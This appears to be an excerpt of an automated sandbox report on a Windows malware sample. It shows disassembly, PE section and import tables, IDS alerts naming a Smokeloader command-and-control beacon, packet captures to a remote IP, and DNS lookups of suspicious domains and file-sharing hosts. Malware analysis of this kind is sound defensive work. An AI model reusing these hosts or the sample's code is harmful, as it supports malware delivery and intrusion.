                                                                                                                                                                      mov eax, dword ptr [ecx+1Ch]
                                                                                                                                                                      test eax, eax
                                                                                                                                                                      je 00007FEF60A96FEDh
                                                                                                                                                                      mov eax, dword ptr [eax+04h]
                                                                                                                                                                      test eax, eax
                                                                                                                                                                      je 00007FEF60A96FE6h
                                                                                                                                                                      and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                      push eax
                                                                                                                                                                      push dword ptr [ecx+18h]
                                                                                                                                                                      call 00007FEF60A9BA7Ch
                                                                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                      call 00007FEF60A977C9h
                                                                                                                                                                      ret
                                                                                                                                                                      xor eax, eax
                                                                                                                                                                      cmp byte ptr [ebp+0Ch], al
                                                                                                                                                                      setne al
                                                                                                                                                                      ret
                                                                                                                                                                      mov esp, dword ptr [ebp-18h]
                                                                                                                                                                      call 00007FEF60A9B9BAh
                                                                                                                                                                      int3
                                                                                                                                                                      call 00007FEF60A97F97h
                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                      cmp dword ptr [eax+00000090h], ecx
                                                                                                                                                                      setne cl
                                                                                                                                                                      mov al, cl
                                                                                                                                                                      ret
                                                                                                                                                                      mov edi, edi
                                                                                                                                                                      push ebp
                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                                                                                      mov dword ptr [0042CEB0h], eax
                                                                                                                                                                      pop ebp
                                                                                                                                                                      ret
                                                                                                                                                                      mov edi, edi
                                                                                                                                                                      push ebp
                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                      sub esp, 00000328h
                                                                                                                                                                      mov eax, dword ptr [00414454h]
                                                                                                                                                                      xor eax, ebp
                                                                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                                                                      and dword ptr [ebp-00000328h], 00000000h
                                                                                                                                                                      push ebx
                                                                                                                                                                      push 0000004Ch
                                                                                                                                                                      lea eax, dword ptr [ebp-00000324h]
                                                                                                                                                                      push 00000000h
                                                                                                                                                                      push eax
                                                                                                                                                                      call 00007FEF60A9BDA2h
                                                                                                                                                                      lea eax, dword ptr [ebp-00000328h]
                                                                                                                                                                      mov dword ptr [ebp-000002D8h], eax
                                                                                                                                                                      lea eax, dword ptr [ebp-000002D0h]
                                                                                                                                                                      add esp, 0Ch
                                                                                                                                                                      mov dword ptr [ebp+00FFFD2Ch], eax
                                                                                                                                                                      Programming Language:
                                                                                                                                                                      • [ASM] VS2008 build 21022
                                                                                                                                                                      • [ C ] VS2008 build 21022
                                                                                                                                                                      • [C++] VS2008 build 21022
                                                                                                                                                                      • [IMP] VS2005 build 50727
                                                                                                                                                                      • [RES] VS2008 build 21022
                                                                                                                                                                      • [LNK] VS2008 build 21022
                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x127840x28.text
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x42d0000x24378.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4520000xba0.reloc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x11d00x1c.text
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2cb80x40.text
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x184.text
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      .text0x10000x120660x12200False0.5797279094827587data6.691650867340855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .data0x140000x418fc80x19000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .rsrc0x42d0000x243780x24400False0.6327653556034483data6.386559817005297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .reloc0x4520000x422a0x4400False0.150390625data1.731638841465645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                                      AFX_DIALOG_LAYOUT0x44f1380x2dataSetsuanaSouth Africa
                                                                                                                                                                      AFX_DIALOG_LAYOUT0x44f1200x2dataSetsuanaSouth Africa
                                                                                                                                                                      AFX_DIALOG_LAYOUT0x44f1100xedataSetsuanaSouth Africa
                                                                                                                                                                      AFX_DIALOG_LAYOUT0x44f1000xedataSetsuanaSouth Africa
                                                                                                                                                                      AFX_DIALOG_LAYOUT0x44f1280xedataSetsuanaSouth Africa
                                                                                                                                                                      GIFOGIDICUBOTOVUKEFORAVOLIDESEF0x44cab00x629ASCII text, with very long lines (1577), with no line terminatorsSetsuanaSouth Africa
                                                                                                                                                                      KIFIYUMITUYIZUREL0x44c2d80x7d1ASCII text, with very long lines (2001), with no line terminatorsSetsuanaSouth Africa
                                                                                                                                                                      YELALASEYUGUBAHOP0x44d0e00x1f9cASCII text, with very long lines (8092), with no line terminatorsSetsuanaSouth Africa
                                                                                                                                                                      RT_CURSOR0x44f1400x330Device independent bitmap graphic, 48 x 96 x 1, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_CURSOR0x44f4700x130Device independent bitmap graphic, 32 x 64 x 1, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_CURSOR0x44f5c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_CURSOR0x4504700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x42dd500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x42ebf80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x42f4a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x42fa080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x431fb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x4330580x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x4339e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x433eb00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x434d580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x4356000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x437ba80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x438c500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x4391080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x439fb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x43a8580x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x43adc00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x43d3680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x43e4100x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x43ed980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x43f2680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x4401100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x4409b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x4410800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x4415e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x443b900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x444c380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x4455c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x445aa00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x4469480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x4471f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x4478b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x447e200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x44a3c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x44b4700x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_ICON0x44bdf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa
                                                                                                                                                                      RT_STRING0x450f300x442dataSetsuanaSouth Africa
                                                                                                                                                                      RT_ACCELERATOR0x44f0800x40dataSetsuanaSouth Africa
                                                                                                                                                                      RT_GROUP_CURSOR0x44f5a00x22dataSetsuanaSouth Africa
                                                                                                                                                                      RT_GROUP_CURSOR0x450d180x22dataSetsuanaSouth Africa
                                                                                                                                                                      RT_GROUP_ICON0x433e480x68dataSetsuanaSouth Africa
                                                                                                                                                                      RT_GROUP_ICON0x4390b80x4cdataSetsuanaSouth Africa
                                                                                                                                                                      RT_GROUP_ICON0x43f2000x68dataSetsuanaSouth Africa
                                                                                                                                                                      RT_GROUP_ICON0x445a280x76dataSetsuanaSouth Africa
                                                                                                                                                                      RT_GROUP_ICON0x44c2600x76dataSetsuanaSouth Africa
                                                                                                                                                                      RT_VERSION0x450d400x1f0MS Windows COFF PowerPC object fileSetsuanaSouth Africa
                                                                                                                                                                      None0x44f0d00xadataSetsuanaSouth Africa
                                                                                                                                                                      None0x44f0c00xadataSetsuanaSouth Africa
                                                                                                                                                                      None0x44f0e00xadataSetsuanaSouth Africa
                                                                                                                                                                      None0x44f0f00xadataSetsuanaSouth Africa
                                                                                                                                                                      DLLImport
                                                                                                                                                                      KERNEL32.dllGetComputerNameA, SetProcessAffinityMask, WriteConsoleOutputCharacterA, OpenJobObjectA, GetCommState, AddConsoleAliasW, CreateHardLinkA, GetSystemDefaultLCID, GetModuleHandleW, GetConsoleAliasesA, WaitNamedPipeW, LoadLibraryW, CopyFileW, GetFileAttributesA, GetFileAttributesW, WriteConsoleW, GetVolumePathNameA, GetPrivateProfileIntW, FillConsoleOutputCharacterW, GetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, LoadLibraryA, WriteConsoleA, GetProcessWorkingSetSize, LocalAlloc, GetModuleHandleA, CreateMutexA, FindNextFileW, GetStringTypeW, GetFileAttributesExW, SetFileShortNameA, GetVolumeNameForVolumeMountPointW, LCMapStringW, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, RtlUnwind, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, HeapReAlloc, CloseHandle, CreateFileA, SetStdHandle, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetLocaleInfoA, FlushFileBuffers, GetConsoleOutputCP, SetEndOfFile, GetProcessHeap, ReadFile
                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                      SetsuanaSouth Africa
                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                      192.168.2.377.232.37.22849729802851815 11/19/22-10:38:14.789628TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184972980192.168.2.377.232.37.228
                                                                                                                                                                      192.168.2.377.232.37.22849733802851815 11/19/22-10:38:20.903452TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184973380192.168.2.377.232.37.228
                                                                                                                                                                      192.168.2.377.232.37.22849725802851815 11/19/22-10:38:10.657737TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184972580192.168.2.377.232.37.228
                                                                                                                                                                      192.168.2.389.208.107.21649738802018581 11/19/22-10:38:23.294845TCP2018581ET TROJAN Single char EXE direct download likely trojan (multiple families)4973880192.168.2.389.208.107.216
                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Nov 19, 2022 10:37:51.845873117 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:51.908421040 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:51.908559084 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:51.908721924 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:51.908723116 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:51.971393108 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:51.979885101 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:51.979959011 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:51.980001926 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:51.980045080 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:51.980077028 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:51.980113983 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:51.980151892 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:51.980194092 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:51.980237961 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:51.980257034 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:51.980298996 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:51.980341911 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:51.980359077 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:51.980402946 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:51.980447054 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.042936087 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043060064 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043106079 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043148041 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043189049 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043230057 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043272972 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043304920 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.043359041 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043401003 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043442965 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043495893 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043507099 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.043550014 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043571949 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.043612003 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043638945 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.043677092 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043720007 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043765068 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.043782949 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043843985 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043864012 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.043910980 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.043976068 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.044011116 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.044044018 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.044106007 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.106694937 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.106735945 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.106751919 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.106765032 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.106777906 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.106794119 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.106828928 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.106846094 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.106869936 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.106910944 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.106930017 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.106949091 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.106971025 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.106988907 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.106998920 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.107016087 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107033014 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107044935 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.107058048 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107075930 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107085943 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.107103109 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107119083 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.107126951 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107144117 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107160091 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107171059 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.107186079 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107206106 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107212067 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.107228994 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107244968 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.107253075 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107265949 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107283115 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107295990 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107309103 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107316971 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.107333899 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107342005 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.107357979 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107377052 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107382059 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.107399940 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107408047 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.107424974 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107441902 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107454062 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      Nov 19, 2022 10:37:52.107465982 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107482910 CET804970277.232.37.228192.168.2.3
                                                                                                                                                                      Nov 19, 2022 10:37:52.107491970 CET4970280192.168.2.377.232.37.228
                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Nov 19, 2022 10:37:51.433576107 CET192.168.2.38.8.8.80xde57Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:52.290333033 CET192.168.2.38.8.8.80x6edStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:52.727514982 CET192.168.2.38.8.8.80xb42cStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:53.275449991 CET192.168.2.38.8.8.80x3f2aStandard query (0)srshf.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:54.221432924 CET192.168.2.38.8.8.80xb96bStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:54.780044079 CET192.168.2.38.8.8.80xb58bStandard query (0)iplogger.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:54.952774048 CET192.168.2.38.8.8.80xadcaStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:55.115462065 CET192.168.2.38.8.8.80xe594Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:55.278120995 CET192.168.2.38.8.8.80x8e00Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:55.443361044 CET192.168.2.38.8.8.80xd493Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:55.848453999 CET192.168.2.38.8.8.80x20c4Standard query (0)1ecosolution.itA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:03.417083025 CET192.168.2.38.8.8.80x8bf5Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:03.578258038 CET192.168.2.38.8.8.80xf694Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.012542009 CET192.168.2.38.8.8.80xb8a2Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.179675102 CET192.168.2.38.8.8.80x921cStandard query (0)cdn-102.anonfiles.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.402832031 CET192.168.2.38.8.8.80xb4b4Standard query (0)anonfiles.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.594675064 CET192.168.2.38.8.8.80xd613Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.767508030 CET192.168.2.38.8.8.80x3427Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.926534891 CET192.168.2.38.8.8.80xf816Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:05.481759071 CET192.168.2.38.8.8.80xdbc8Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:09.012053967 CET192.168.2.38.8.8.80x5215Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:09.198158979 CET192.168.2.38.8.8.80xf417Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:10.570333958 CET192.168.2.38.8.8.80x1f89Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:10.754020929 CET192.168.2.38.8.8.80x9505Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:10.966792107 CET192.168.2.38.8.8.80x729cStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
